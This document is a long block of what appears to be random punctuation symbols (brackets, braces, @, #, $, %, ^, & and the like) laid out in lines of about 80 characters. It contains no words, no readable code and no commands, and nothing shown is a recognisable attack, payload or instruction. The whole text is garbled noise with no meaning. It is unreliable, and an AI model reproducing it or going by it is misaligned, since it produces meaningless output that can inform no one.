*^{+)+{]^+%{^^&+@)#+@@}*^(^)^)_!%!&())^!+]&*@[*^@{+]$[_@%%%&)(&$$#[@&$%*{[_@)[{[
_[!^}(#$({#%[&[{]@*^^+&&((*{((!&%}$$(##[+_#]&!{$}@*]((!%_]&@]![!]{$#%^%+#{#+#[*$
(]@!%&}(]@_)!{*))+^}#&*}@##@}](&)!#${_)&]&[^%_^^{{+&&%+@&@!+@__+@#]$]*!(_^+!$^{_
*}$[%^$(%{(&])[*[@^+_[]#%#*!}{(!}#](])@++{&}%!%+*#&^&!_$(#_%([#[_^[[{$(@#]}@+[@%
@(&&@}]]!@]$}@*}#(^[%^!_(&+(!)[**(&_!*_*!*))+&@)%&{#*[%[{@+$^&@]__][#_)^+)#^&)}[
_&$)](!^{&@(&[&}$#%$%!%[#)}*_(!]%[}%__^%(@}}(^@_(&]^^#]!%@{}{&*+@)&(#$#+%*&@{_]!
}&&[(_*_%&($%(@#){@_+}$!])}%$_[+$(@)_}![_&*%_[!$}*#}&]{[^+&![}%_#{#$[{)({$$[}{%$
^!!{{})))!{#^]*@&}]_)}[%()[](*%@[__%#*}&_(+!{#[)!@(]+]}$+%_{##[(+#$^*@&@{*}%)({!
*#^$(]))^^}{&})@**}!@[{{[*@^}!}}#))@*][[[##@)([_$#*+)]%#{]![$^[@!^@[([(){+$)(]]}
($)[!+#!)*($!}%!%)]{!@}][_{]({)*^[{%[#]$]![#^(!{_(@$@{]_^%!%]%[#%)_%%{@&)@{&}@*%
)}@&+[)!]__*(#*@)_[@}+}$!^&_^]*@!)_@!)$*()}[@*&}){%@}_@$[@]$*{_^}+[{}_}#+[&(^]]#
^^^@%#((}!_*[(}({}@{{)+*}$@!^)[_%(%}#!!)+&+#&%}$*${)](^+!!])#]@}[$^!}[}}[]#_@@]}
)+#&{${%+(*_$$^]}&#+^%())^_^@(_]*^]{))]+_)$@_%*([}{${^(]{[[#(#]&}+l}%#@}{{)%@{+}
{$})($)({%@]!]]_(#_$[@_][+_)(!^!&+*{@*$#$@$$)(@$*]]{{}])}+[}!^^]}@(*%^%![+)&$}]$
^%)[*%%@(@[#_+#{*#$%{_%*{_%{{#&[_@&!}#__)$+*+*$_[+*]+#*(}&}!*!_@#%%!^[+(}[}!*{!+
#(!^_#@^{$__!_*&+}@[%+&${}()@$&^(^{[%&]_}}%^}$&+&{]*+%][@%@@#*^(^*@+*#*^](_+!$)+
*{[]{@*]$%}{&#${_!%_(@(}_)){^(#_#@*}_]+))$_$[@+])^]{$]]__%*%(%}_@@^[[)^_[@(@&**+
@(_#_&[!%$@&)&![*(^$+!^$#&@!+_}_[_]&$!]^]#{
}([{]%@^+)[_[^*}[_[}$^(&)#*&&^)}!%{[{#_#(^%^_&_&_)!+}}*]@*($^$&*{[+&}*^&%])^%]*(
@[)+)%}]){)[##&+#_)(*(#&)}_&(()){*_!}*^[$^*+$@{++@_#%_^($*}_+([]*&^$()$+])&)!]}}
{(%$#(+))^{!]@()]]$%*]%&+&)_*_{_(()^$!!_[#+^@(%%([*#{)&+)))@*$@]#_)#}!__(_!%#*{]
(!%(^@)@_&%@)(_[(#@&^[+([)+%}^*{!)!{+(+&!)+%^{*_]+&*%&_*$])&^${%+#+^+!(}+&@]$+{*
]!@$})^+*$^!$$!}_&#})+{)}[_#^[(*!)@%{!!(&^#${++*#@&^&!]%}]{!$+*[*#]}{_{_!&){%[^_
{#_(_$(^)#*@(##^*@}}(+&{}_#{*^]&)+]!++)%[^%+!+%!++%+*&$]*$!**&$$$+(_!{[++(@#[+{_
+)^$]#]*#+#_&@$#&&]*]{_**##%#{}^!]{])&($@(+**[_!+_}&#!]^&@{*_@[&*${[+}@_{}}[]+#_
^+*#!**[_@#@))@@$!!)#%$%${[(&#(&_#[{*{%@##!^@*)_!{^{%[]+%]}}()[$%(_{$[[^{(]]@%{_
[^_(@[!*%*$][+@)^]+#$!_)@}!*_&$&%^@{*%)!(*[*)(}^&{{}_[$%)*()@%)#}_)#}{}##&]{$](#
]]_$[[@!))^*&^@!#_}{_)@$&[%#[]*!${%!#[{(%$*_*+$)]%#&$!){&&_%##_]*%$@^%@&&)*$_&(]
@}!^+[]&}{&{&%]*{_*#^++#+_&(%]+_&}}^^+@+]@])}[${%$*^@]{^^{+#(#*%*[&_*(+#(*[$[*]$
!}#_(#![^%%+(^&*(({%[]@^]$([@@@@*@@)&}@)^^{*^_@*{){*((%!($+^_!_!^$$_!(@+%&[!_$#$
[*%!@+*^{}&^&]}$#{*]!}{+#%@]$!+^$_*(@]@%})%$!{[&!({[##$))(@#+(%}@)$)*@++}%*&(#^{
@^[&[%*_%#$_}${#{@@^^![[_$(!$&}[&^}_*}@@_}*+^$%[*_(+}$)%{@)&^*&(*]&$!_[{)&{[[_@!
+_!]%^[)}}){!+{%}@##&@@([%&]+]+)!@}^}&@@_[[!(!+[&!)@*%@_#*(!({^}$++!#*^!]+^%*$$)
]^(]#}]+)[@__@]#$]{^)&@[{*+%%$(&}^!_++}&&@+]}*{!}^+#(@(@$[*%)*$((&*{*@#$)]*+_%@)
@^^]^^)()*+){!+&{$}+&{!{!+@}_*&*$}$){]}&{({_]%+{_)%(#@()]}@]]#+$*{*$$@{])${*($#}
@)+}!{*_}__)(@%*&}!*@#+!_#@!&^$&})&*]!}{]]$#]&$_@[*!)%_[}}_@+%{&_+_$^&^)]]&&}(*%
((@#$$(#[(@!({{}#&$*]$[{+!@@[@*#+_#)(*_^_(%#%&[%!(+}$&&)%)[{^$(]*{++})@_[%*%]*^+
%(@#)])+^_*+*#%+_+}^{{*[+%*]$)]&^*}+#}^!(^(^)^_*[&@[}_*+$!{(@+}]{_}[^$[+_][{*]]+
!#+$$_}!%^%$]}^!*)]+*(+{#{[%^&!!^_$*+@}_$($#)&!)$_))*+##$&$$(]]^@_@_(!^%{_&@&+^{
*]!^&+%_}#@&&]%}@#^#!##*#[])*#}*](){+*}@)]+)](_(+&%{#}}})_!+*_}%%}%}(#!&*+{!!]](
+_%_([_&$*{^$*)_)#*@^_+#({$][)%@$^@$[&!+}*^$(^!)()){&&^{)]&)]{@)$_]*^@]&)@$#%#](
)+}[@({%[$!(](!)_)#[&[]}^]@*#([}^]@%%%@}[)($($]&^+$][*(%%+*$}%_]]$!@+(_%+&+{))@}
*_$#^{%_^_{$}$]^&)_!_#$[}#$}}%(*&)%+++&$[{]!#{^_{(*$[({(&(_$)])%]#(&)%$@]{${}@#&
]$&&]%^}^*#$@{#_&&(#%{)]+_[*{@^{@^%}_$[]$[((#@(+^}}!})!)$@})$%}*@]${+}%+_!!@@^*{
@^)[{#%&$*}$[*}#_^}%+}#^_+)^+$!_*#+)^_((^^+(*+[]][^(^^^&^}}}^*!(^]]*&+}[(#%)+(#!
&[&&_))#@+*^]_#[#{{$+!!%]]!!!$]^*!^^_+(%)%&@$}{&]$}#[[^($(*)]]%_(#}^((_@{)]}*#})
%$)$_%$]%!{)})!^@)[())#&#}@+_$##&$[#!}^^&_)%][]&$^#+@}_{@({[++&(_!@%@#&}^#[&[^%+
)[{^)#++[__(*+&*%(@]#](+(]]}%(^!(+@]({_[][)(%(&}}&[[_{#@#)@[#_[$#$[%[}{]{[)$)%{&
+&(@&%&^)(){)_[_]#^$)^)[!_]]&!)}+{_%(&+{(+%*}][^%)#{{+#@!$_*_[+[&}{*%+*!!%$))$(_
*@($]}^{[_&$@%^%#@([#_[_#_%]@(+^))]_@%%}%({_*^^@#_{$#_[&%{@$$^{%]}#!$^)+#)[%*^{$
$_[#^!+^[_&*%!^(%^![@^!_+{_(&*!!!$)]**^!%*$%{&*([+_!^]}&@^$)(_(%(%[}%#_^$#]@*^]!
%%][^]!%^%[@[{#!}[!}$@)@{^^[![[*$&$[#+{+(*)!^!)*+%*{{##[)%*!&#*[{%@!+((@##_}&+$*
({#!+*]+)$@+[[&#*!%(]&@^&#_^*@&@_((}_!!_^+#}%@_{%}$]&{{+{]+^]#*[^@]&}*_*}#!*_$#%
${!_{]{)$)#{*@+@@{$_]]+&+)^+!()[_*]{^^]*([(@!{&{}@()%_{+_[+&&@}{}(}$*%@$_^){*![{
(^@^&^@&!+#&(@%!)[]%((##@(}]_*#_*@%(_{$_#](#_]*]#_+_[_])(#&%#]_(!)]*$&*##){}]+*@
$+%([}$))^^!{}&%_%+$%&#[}^*_^^_#$$&^{@#}%[$&&({&^]}(}(@#*&#^)&{$(+^++$!*[{})]}^$
$#!&#[%{)(%&}^}[]()]$@])$])^#!]!%)_)!(])(}&*($%@%]#&(+^+]+%@[([@^]$_)&&%^*${[!_*
$)$__$+&@!@+#{]]@##(*]&+^}[!{(}%_}[]_^{(}@)}[$^{*_+@+[[$&#}^]^(})()())@*)!}[#^@{
(+_$$+]&#]+*^]))@}}**&[]}$]&!)^{)[]+#%$(}##!)_@$_)$_})[#%[!{*)_*(*)*$}#(^&){+]_]
()))_)+]{)*&)@!@&*__%{@*]&${]${@_&+)@&)*+*!][#_][(&])@}@!#^!+*@]!#)[+__&&%}_+$&$
]#({*#]_#]&*}_((+#!}]_}+&_+](!#%+@$}+@#&{}(&_}^*!#$_@}^*}${)_}%)_!@&#])%{#&)*!(#
##%*@!]##(_*{}@$!][]&+*#){(_!$$_]_^^]#{#))}_())[[)}@$+_}_*!{%%*![$*^#){([&&[}#%[
&]@_[@@_*)}!}#_})]_@)^[^&#&^!&{](&_[!&#}%!{)$[$()}*^#*{@&{]*$%$$*}@^+*)@(&(+%$_[
)*^{{![!&&[*]#)$}){^]%)@*]&^@@#}#*%#([]^&%}]&_)%!@@!*$%+*+#+_%%+$%#!%]+]{^{+[$%!$![^)[&#*@{+]#
_)*^@})]{])*@&]@#+$&(#$)!^$$][(*&(]))^[*^})!!#))(})]&@{}({_&)*$@{+!!]{($!{+@!({$
#*![]@@{%_^)+_#_][^$!)#*!^&]___}%%&_[}#(@+}^*)%[&!&}$^!!&]#!}(@!)%&^__@@{[+)[}#(
+@#}_*+$})@&_{_@@)(@#$!){}@${][#[#([)%[@&@@%[{%!&^#[!_{_@(&@}!^^*$(^*!%}+$)$]__%
_$%@%}*)!@[$+$[_[]^!][]{+!#]]*+&{){+)__$)_*%!{^&$&$!)*#_{{$!$!+[%[&$+!@!}@*_[$&_
)*$*}%(*^{}!$^$%*(!([##@&^*!+!%@[+[+)@({{_&**&#_@}$$[)%]@[}]}{*[++&)#)&!$!)_)}$+
#]!_^#^*%()^#&(]&}!}[[[{_&)#}#@^#[{__^]^#((^%%[}!)((%(@](#(())#{@)[!*](%}}))+!)(
})(*}]#$[_($^_)@+]@)_)*[&@]#+(_))]#}#@+#@@!_+#[_+_]*)[!$&@**_+!]@_]&[@%]+@[}%$})
_#)&&]&@}!&[&^*#!^&{*$[{+*)]&*##%!{@)@*!^_&@*#^%_]%(}]{_!)_%}_&&$$+^(_*())%#&&**
)(#!@+^!+(^+#^}[#($}*&*!@&[)+[@][[]])#&!%[++@!}]$%]*_{@%{@_!{#%([$@[^[}^!({!}^(*
[*&#$_*{$^!_!(}{*}]@($)%^)[}#&&_&@]__[$#*$*$^%]#!}[*&_@](#$_[#@]}!_[&+}[%]{)@#&)
]+(_@_{#]^^!&}%^(*^*[)#]({+@+@}#(*##{)&[#}]{!#!@+++^_](%+(()_^]*}!}!$(+}&{*_!@#]
)*@#}[}([%{[#^${[&)*[}#+(%^$@+]&@{$[^_^[*)@$]]+}{{^%&({](!&(%#^[!}&]$)+*@%%)_&{(
)%*@_]+][&{@$$]]+*}&+*{+$)$}^)!{+**!@[(])@)^*%@^@]}%^^!!$&!}^{&^@_+]_]$)*#({%]#*
[+%]@[^$%_}))_({_]%${)}_[}^+(%_+}*}*!_+^^@#]@{)}&[*#((#!$[@}$)!!]&[{)_#%]}*^@[@$$]&#[@[()${*#){)$(&*#(}@_%]})&[][*])+%#{{^
#}%)!))({*^@^_%@!)(@_+$&){[[(_+&^_@+%[&_*&#%#)[)^_[*+]+)[!^}]%&([}%@[+@&^^((^+^]
&(^[%[$!!]#]^_!!!&&{]}]]&)@#}@_]]]]${&#)@{}{!{@%*)^@{$^!^+@]$$$&)**_{[[(%)]@{*^(
_++]]}[%{(!!(*]_!^]{]$#{&$#$})+*}$^}&!]{}^_{#!}{(!%[%%{$%(}]@&$]#+]**!_#&[&$$!{^
#+*&!_^@@^_#$[&@(@$+&!)_^+{{__}#_)^+(@@{[){))@[+#*}_#]])^]^%^*_$#}]%)@@%*!!{^&+$
$_+($!%{_]$^+^@_()#^[[^)$+@))&}+_$[_&+{!$]}]%$_!}[@)}[_($^+#}_%*%@*+(^!+)()[#*_#
({}[*$@]#*[#&%#!^){@__[]#]@}^$*]$%%(^@^]+!}$#$#@$[@}{#+!)!#%%!#[(^*(*_+*{#%#)%(*
_@([()+#_){${^[__}+#%{[&{_@![{}+[#][)!&!&^$(_*_^^}[)&)}$%%)(#[)&)+!+{@^@%#__]$+]
{}+[(^{!(&)%*(@^#+#)*&{)[^+@#{{}&$]{{@_}@{&${#%]}*!@)}^{}!)(!(_$%((#%%%!{(_(_$@@
[@(!%!@_]!%*(+(^[_!_#!)[+@{(#%!%*]$&#@_@!*&){__(@@_}&*+){_^#^_}*+@*()[}){]!#!&^#
@!_%&))_^@!$)%^!*%@{+)@%$$]&{!*_!}@{&**(}&^+[@%(%*^$(^+{{($&]!_{})!*)_!}!%++[%)@
$){^@]#^{(!&][%]+[^**^$&*@&[)%%#$)%[^_[@^*+)@)}#&&#(_^+(%{)}}!@^+$&&$]{(^*(@]@%&
#+{$]$_[^{[*#}%@+}[@}+@**$})^@]#&[+(@^&%_%!$_}*@{]}}_(#@[*]}+!_#}))+]]&]]@$^^{+[
(!_}&&}&}!_@$#)]{!#^{%(#]#^&]#}^%{&&*}&(+@^+_%]#)#)_()[(_&!$+^#[%@+$]]]!!&^%[]!^
%%@%)]**%+_^${$(}]}^{]])@!%+@!$#!})!($%$@)+*[![}]&__[$%!&$^})%]^&%(+^+#@&^$]{{!)
[(%%!{![]#[^$%_!#]^)!]![])!$@+!^@{%}$@[_#_+{#](!^*(%#@_^}^__[(@&]}]@&!)_!$^%*(}[
+*}[%]*#@{_![]$+@_)]#@+]#_^(!*{#]!()@}}%!_&@]()()]*+(%*_{@)]#{[*^${_+$)@[{[$*!!{
%)+$^^[!!#^]^+*}#{_(^*!_!@]}[}%]}#]!(_+[[_)%!+($*@&$#*_{^@[()&+)$_[%}(^*^+}[^&^#
@$}]%(%&_&&*))&%$![}[$%}@!]^*}*)_{^$_!(%]^}!_#_$$^__)}[#^(]+@&^!&*($_[_$%])]*%%!
#!%+_{]$}($_+{^*}]&[@$^($^]()]+)+]+_]!*_^*^!@{]_){#+_#%(*#&#%(]*$[%%]$[}!&*!^^()
!}[}{!+^{@}!$)%+)}{*#}%}@]#}+_#+&(*)_]}#(!{(*&#&)$_{^%$*)]!##*}$}[_&(#^{&)%+{(_%
&[#$!&+}!*#%_!%+&&[@(![+*@}^%@)@+(_@(%{$[]_[%)}_))}$*#+$(]@%{#!)&_#@!!]{!}){&@@(
)(_)[&{!]%*{^{{]$_&]^![{_##($%)%}#})(]$&^^}&!#@@#]*^^$[)@}!!)@)_*$$[{@%)_^!}_^]]
})]]{!_@)[%!$#{&@!_+_$[_*@!@@@_(}$!$!%*($[%)[(]{[]#%*(**{#%$)_@_*]({^@!$))[$*$#+
[+!&#$$!})[{#(@{}&&@)&}^$!%_*@%#*)++{+]@}{@}*@^!}+])+{[^*#%(*(+$_!{])}+$](!*{{[{
^[#++^*[_^&![@&^^])&%#_*}^$(#^&[&(#(@{)%$(%]*%!)^*+[!_%@^+&(+([(^)#[{***![{*$@[[
]}_&]{[})+[^+%!^^@&[+[)$%)}(%}&[_}}(&#^]#!@(+*)){([)**({{^]@_}+@$%{)_&{[{_}{_[_#
!&@@$][{)_{$_)[&+]^!$*]}]+[$$#+@*_}$*!#]()*[[&{*!#)(@%+%[{)@@@}}[}&[+)[}{_^}*{+[
$}([#)%(!(#[([@^)%+[#&[#%)}+&*{(^*(])^{_]%{^+^^}{#&#[*$^*{#!&](}_#$++#]$[^%+}*&@
]+]@]&[{*!)[{(((^&$%}[^#[+][@_%!#[}][}^{%{^*(!!*+)^]][+{_%^*^&+{#{$}#$%_!*!&*#^!
%*)_@)+_$+[&@*{@(+^@&({##}#{*([^_+@]*{+@})!)&))]@@[(({!!)*(}($__(]+*}[}&+@}]$$]*
%%%@$+$]$!%@(&]]}{([_$*_)(}$]&*[%_#**^(!$#(+}$}))$]]!#^&[}]#!&$){@({$%(&@*}](+@]
_@[(%)])^!#(}_}!)$%@*+]@{&(^}!([!%$!!]@$$!}*%!_#{($*]+(!@@)_(+^]*#*)]){}!_^&&&]&
)[^@$+%]@%){!]]}}$!&}###)&[[@$)_*@}^[**)+#{{}_{#]!+(}%]$###{(!]*+[&+^(_(&$)_%]![
})+$)#]](#!{+)(${$*)[)$_&)[_%)+@*_]]{[{&_!}%%*$+]@%#^}^+*_}$!}@$]@&[{%(&%](}!)&*
%![[!$$^]}*!$[&_{_@](+(_}@_@^{$+%&(+[((@}[&${@%@[@%]})$)&&#*(%}_)]%%&@]&&{[*#@@@
!^__!&+^_@_){}[)*[#__[[+&{(!*&[!_@*&}*)%{*+{(^++^!][&#))*]*^_&^+({)[)$#+(+%{&[^(
*}*&*#[*!+^^#}!($[!&@!&_*$}+%&(%$!!^$#]&*[#)[}!^^@+^+#)^$])$^[%#[_+}]_)$}+[!]%*$
@_%]^@}))}*&){!%^{_(!]&+*%!*)@)@%$%{[@**!)#!%@+&!)@{[})*@)*[+}((])*)[{!@#[[}}*!+
(!%$^({*[^#&_](^]*%_}*}@+(}!}*}%$)[$}_{###@*&})_+%!*)[#__*]){_^&$%+$*@{%!}!!(![!
$(){)%!+{!_]+][}(($!_+^&_+_#&{%)$_#)!#_+@[{#*{]^+)@%&{@$$$@+_+^[%&(&#^^%}}%!)&&*
!([+{#(+})+${@*!{]}_^&_^}(@(](%^)%+[$!^^@_}[&][}@*]{@[]$#$@)++#&)#@[#)^(@{[!)}!&
###*#()&#*}%$#@^(*[!+#}*(}*!&{*$%%@@%[)_{))(+)[#_}$(^#$%}!$(#+(*{]![(]]^)@##@{#%
]*{+#%@^_%[+${+]{{]@@#%!+}#_{_(^!^}%[{$(@]&[#^_^}$!}%}@$(&[&**]++[*!(!@$[@&+]+(]
]^!]})@%_([{)(+$^{{_+_&_^&!+}*(}%&)+(^}{)@*^#(%[{]_+^!%!_++_[{}(_[}@$@]!^*_+{&{]
@}]}*!#@%{{)**)&!#@#{}(_*^))[{](@!(#!)}]}$]++]_$!+(!)[&}^])+(]#$[%&]#@%^](&&#+]{
[(*}*[{(%&_{#^}#*([&)*$+__#^@%]#^@])^*)$_^}@(_%+*}%%^_+###_{+*_$]%$%*[@%_((_#[+&
![%({@]#{]+*{@{!+]$+&^)_$[([([!!%&&+]^{_)*[#[)[*&}){%%]@$([@{%!(#+]^@(%*}([!^[_(
(]](}^]#}_!@!#)!+_}&!+_()]{&+]_+*[([))$_)$!#(+@@*_[$)$[!^&%@{^%{@%+!+{$&[#!&!$!^
+]@#[&&*[^$(@&&{((^)%[%%@[])&}%]]^[)]&@{*@([($_]_{[[@}^(%#]@^]^$%_!%_$+*@&+[+)(&
@)[$#+[}#[}^!)$+!_[}@&}**{+&%$](_&](&[]){($_^}}*!_*!]@$+($%]){[_^^_%([)_$@(*###@
}^*&%}{%[^]$&*]_%@&&]))$_@%[@@}!^@%[!_#@(#[[$_&!_+)@+!*#*({)**(]&])#^][[%_%[}${]
]_(!%@$++])^+_!#___(^#{!(}^${%[##+]+[!%%*&{*#^$]#[$}(^@_%*$[@][%{#*$[^*]&}[+#*+!
]#)}]&#}&%^$]%!#$!{)[*%))!!%_%*%%#@@*}&[&@([[})$&($*}+*&((%$}+$})(^^_%!+%+(@#]#)
}${@&$![)#)$$(#][(%{$+(({[)$$@%}+#*]%{&[#_}@_%%@!]+){{@}&}%*][}+*]*%@@{{}**+{%^)
%]![]!$_)@(@#+)[$(^![&@})%]}{%*%%+!]]}+&@^*^__%&*$]]}$^$)$}*@}+}{}_)[{_+_+%^[)}!
$*^%$%$+}_)#%+[}*)!](!^*&[*[%+[&+$^$@]!(!]+[!}+(&*^&#}@}([]*@$]]%_{]$*!_{)(!+_+@
((!&}!({^(#*(*#@%__(_)])*])($}[]&@_{(#*_&$&++&@(}@)+^&#+})@{]({]&})&_^*]_#^}$$)[
*$}(@^{[[#_{*^)+(_@&@)*^]@{$]+}*+@}!^[!!$^@*_*_!$!_{][{#*!%{^[&[}*%!(_@+*^*(+_}[
&#&]#_$}@_]$@_+_)%*@^${)$(^&**$!{)+[%]%!!@%^&$[)%&*&]^+$}#}{^_*}%&)!*%[[!!#_*@+[
^@^$!{_^&%%]@&_)}&_@#%*{!*[(($#[[}{#&_+%&+{*_*$%[{{[[$@@^_%(*#)#@%{*)#&)]{[_{(]+
^*&#%!%){+#)!%@]]{#&^)_{%&+[*](%@+]]}}&+@&]#}{{*@+]_!^@@)_[@_)@)&]%{_#]$_!({_!!_
$&{(@*{_$$*)(^*[)+_{!+%}+)}!}$^#++@@^$@[${%+([+_[&]}_$]!^%_+$%*[!%(()%$%{!@{^*@#
_&$)]^!(!*%&#+)^)^$&}(((!^%*[+({(&!*_#[@)!_}%!_{_)%_)$%$^%^!+)*&_*)*@})&&@#@*]}@
_@+#+&[^$#[&)%+@]!*(}@+#*[^@]%#^!*#+#$()+))[!)]]}@)!]*@#&#*!$&@!{]{^$*{{$$]%&++[
^(_}{%%}+%](#+}^&@*){+]@]}{)!@[#{!(%{!&@({_}{_#&(^()[}[[%##*{}$}$$()}&@++[!%}@$_
_[!(_^@{#[$))(#$^]*_%[$!&]$!@_+[#%@+()^[(]&!)[{$+*$)#)@)_@_)([%[&{&^[}*+!_]_}]##
)*!@&[+$}#!&@{&@+#[]*)}!_+}){{+)@!}!!#(#)_#!{][}@{^#}}_$]&*%*[^(@]]*@($]$$]$_+^[
$$%][[_^[*$*)(+_]{]}$%&}}(^{+#&]$&^&!!{[[@)_%!][_]@![[$_%}_[[{]!_*}[&{$+![_%(#!}
$)#^)#*&*+(#)#*$+)#]_%]%!+(()+_^({$**[}%@*!_)}%!@[_+$_))&(**}][$([)%{}#}&(]}[&+(
$&+!*]!{+_&@@}}@!&}@#%*{}%_^]%(_%)^!#(]^^@@}}(}_&#+_+*$!}[)*^_#!)+@(%]&#[_)[({*+
#!}^#^]]@$[(%&}#!#$+)^#$++*+^_]_)[$_]((+(}+*_#&*{}_&+%#+@&!}#%]#)@&__}@})}))*]*_
#)$&%%)%$+#&[(&*&^$*%@[)_)^(%^()!]!{$$*}(]}#_)}+*&&$}^(@)$^+*+%*(]+}_!$%@&%@_}*[
*[*$$@}@_![^]+_}!&_&{^+!@{{^@}}_*))%)]]}#*[*@+@#^+[+(#)]{_&&%@$&$$@}*}!%_!^*((%[
^*!_(${)(_+)!))$&!*%^#@!${($*)^)@+@+*}%(}@(+@#^%![([%*)@@)++*!@&(+[$_*^$}%)})^)^
_+[{__[@(&%!)^!^^@}![{{^]$!(]!{}!*^)@)_^$][#+}$[(])]&+@^_[]@^@&^$]$&!@_)[$$[(_#)
+^})*$%&!#)!)}*[#&@!_{&)[&@*@^#_(%!*]%#!#)(^[^@[%)&!+]#${%{&#{+^^___@+[{]%&!#((#
@@^})&)$@[@*&#$&+*!)]*+%#]$%$(}&!#}*[))(]@#+_%_#]}}+(^[_)&##&^&){[#{*+#)}#!!&#!}
+*#(}@^(+^+[^(]]^{*}}_^{@&+(}(+)%+}[!*@)#{{#{#&_&$*+&%[_!)($([+%$^$!)%]%&^[^@@%+
(*(*#_*_](@!$$#{&#*!)_@#})_]^$$^)[^*!*@!#})]){}{^{@)#&}[^^])!$^${^$$#{]^}#_*+!%{
^!+@#@[)@{^){{])#((!(@!%&$%#+}#&!^}+(#()^){}]{)!(%)^#}#)!*+}))+(+(&&[+%[##*$[)}]
_(@}(^[&@)^&}#+}{#(!@$@&*@+}%(@)]!#_#){^%^%_[&+[(&{^[**@^(&]+!#(}&%]_^_{(&**$@*_
}{{$&)^##]()_}_}])@$[$]}%}(^[^{(!%[)$[]^[{+(!}%]^#&#!*^%)^(&])%!#($[+^[($%$&$[(]
(+}%$*@+{)&]@+_[_]!!^^&#_&(^$[*}])%+{(@$$+_}%)}^)(&#)_(()!@[]&*++^]#$)!*]*+)^$[(
{}@*^[@)@![+#^$!%$!_!+_^*@$@@@$$+[$+}*)}#{))&)]^@($[__+%&+__}$_&#}[#&[)}^^]}}]]}
!*&^%]+_@#+[[@_%+$!@$%!^)*^}(+}$&&!!*_[}+@*@)^_%]]$%!&%*+_[&![}(*!}!+(*+[#}{_)}*
&&!]+++^^#{#__$@&([)*}]%$+@##}[&[*]_{*@]%&!)$}@&}!^)&@$+@#&!%#+*%[*[]$)##)##_+{{
$@^)[($^}@%}(&&)_}$%}&{$)@[+!}+^]+{$+$({_[)@*)&!{}+[$*}#!}@_{{(]]@*%*)]%_}%[{&$)
*_![&()!%]@[{[@%_)$$^#+$)_$]+_*_{%&{*__#_*+^_)$[%&@}}##+(}{%#+!%]!({$+_(}^@^#_@+
!($(#@)*%{]*+$++)]{){{@#}%)^]#{&){^+]+]++{_)&$*+&][}&#^^{__{))^^{&@{%+][[{*!_!+$
(&*}]{%{#!^!**+}[(}^}!%){(!&#^[+![*$&${]^(])#&[#](}[%%*${[)(*@_@_(((+@(({]%#})%)
#&^#*&+$)&($]!+]&^$@)#*^_^]{#%)*_@^!_+*+*{](*&[}*[[]#*%!*(&!(@)[))!%%)&@_{{!@({#
!_}![($%)}__*&%(^_&+){_#]{_!]&(@^{[#)%)(++&{{^}!^}&%$#%_}_!($%]$}_()&&#{))$(%*&{
([^@+^![{@%_@@@!(%}#@})#_){@__^@_[_!^$(#!^^(@}]+${)]*_^%@$%$(_^]@_$+^_!#}(]%+%[@
@)][!!*((]}^(*([__#*#}%$!]+&_[}*@(@^()_*]%&%)&[){((@*%%+)@$+_+{]^$+{%^%}@[*_${]!
[!^%%$+%*%&&!!&+^])}&^$$!*&(#){&^&[$}#*&}%#(}@@_*}*(}]_*}%*]+&){*{_&^%+]$)&($!!_
#(&$*!@^*[&#@(#[{]{%@!@[#@@[+%_{^[]%(]#&^$&+{{$+*@+_(&^{^!)}+^$$(*)${(%@_{!{}(#(
}{#$_!*^)@}&%*^_&^)])[#!}##^%@]([[{@_*}$^(}%&+&{[@#)){$[+){@}$]{)@_){{^($*_[($+@
@@@$]&@{_#[{!&$!%##+&(%@)^_}+^%#@{^{%[*%{&#[}(^}%((@#&_)}^][#})[%%}(_)_+*%{^*{}_
{%(#+(@%($*&%*##^+){([%[_&#(]*@+_!^_{%{@%_&%&[[$%+)@{[&(_@%+*{#_*!%+&[*(+{+*$})+
#%[^{#(_}!+!$)%@{}&^#+_](]+)}_([*@[^#$@&}]}*!@{@[++$++(&]_}@{+}#%)}+&_$[}%[%{+@)
#@%{&_@})$}*&!$}@^&[}%*!$(](#[#$+}@#%&(+($*}$]%]$$]$*%%%
$(+((!)){*&!@_%((^${&($@+[!!])&!#%)_$[{$]&[)@[$[^)$^#^)@^]%[&{*[_{}&$)_)+}$#}{$(
#_)}}@^${#%)@@[]]}]%$_#&}[@%{{(+{@%)_^%}*^}$#]$!{)#])&#^(]]#}^^*])*#$#@()^!)$$!@
+_[)*^_*^+(_]){*!^&][&!])$_@@]!@*!*$^+&@__##^##[%_^[@)_$%^^_&+@^{(}#]+#}$[^!*(_^
[[^#(%%([#)${*]}#$+))%}&#_](}$+*@]#]**$+@{}&{*[{%*[@^)+]([]{![_&&!_}#${%@]!(+%!}
%*#}![%&$]^!+({}+])()[]_$(^#)*^$}$^)%]{&#^)!^$}!_&++#&_[&!!_#$!_%#}[+)+@}^_)&&__
*}&+*{^[!#!}&+_(+]_#*+^@*({%((])}%%!%+#^_&^}[*#{])()]@#%@^$[$^!_)!@_@({@#&@%$+)]
_^{+#$@^*^{%]]^&)&}!_}[@[({[+){+%%+&_@}@^&#$#_[*_[%{){_[]*!$]^__{)!%[#^_*+!)&&%@
]{{{%[@_%)^&]{#($]&&$}#%++)*+&#__}&$*{]@}@}{{+*}!&{&#{[++*)}&{%*)!)_@@}%#@@+{)[!
$+**(@!{%!@^^]^#(@}[]@]#^[*+*[^!*_&))*_&((]#}&^$^!#+[)(#+(}[^(%}[${*)[@(&^^*{{%$
^^_)&([^()^!@)!}&$@([&%@${[$%#@}+@_*!}&]%]#_[]([%]+}}&[&![_}*+)}{&*)@*)@@$_^]@^%
)^%({{%_^_+@%%+#[#$$@#_&%##{+)+$%*((!{{}{]+%%+^_!+{@]{^^+^}{[_([_^)!%_[+%@!%!@(+
@&$^$(+^^]$$**{^&*&!_[_{_)*[{@![@%+@){*{&}%_%(%(@+{!&)![$$+(}^)[]##$^($+[#]}!_#&
_^]!$_)[]+@)_*@![_($+!@[#)&]!+&(_*]]%%_@*@!&&_!{^*#{+[%$$##[]@&[#{$^%@&$([{+_#{(
})_{&{}#_+&@$)}#&]$(&}+&+!&_[]%@}[@^]{)!_*+$!$(}+*%{!*)]}@%!*&!}([*+]*%*)_%}(@^]
%&[^!%!%]$!((+&%%@)!%_!+#^&}&$*^%%)#%#_%+[_$^#)%#@})]%^![^]*$&%^@)$+##}]#*]&$*()
&)))+&^[_}()^@@!)&]&&!$*!#+#()^{]__@!+%(({[__&**]&!*(@+!{^@^*[!)@#))$!]^[%}]#(![
*)$_($)){@%}}*+*#{]}}@)!){$+$^&$!]*)$_**(_+@)+{)![!&+&_#[_$%^+&^}&**&_*)]+)]]%{!
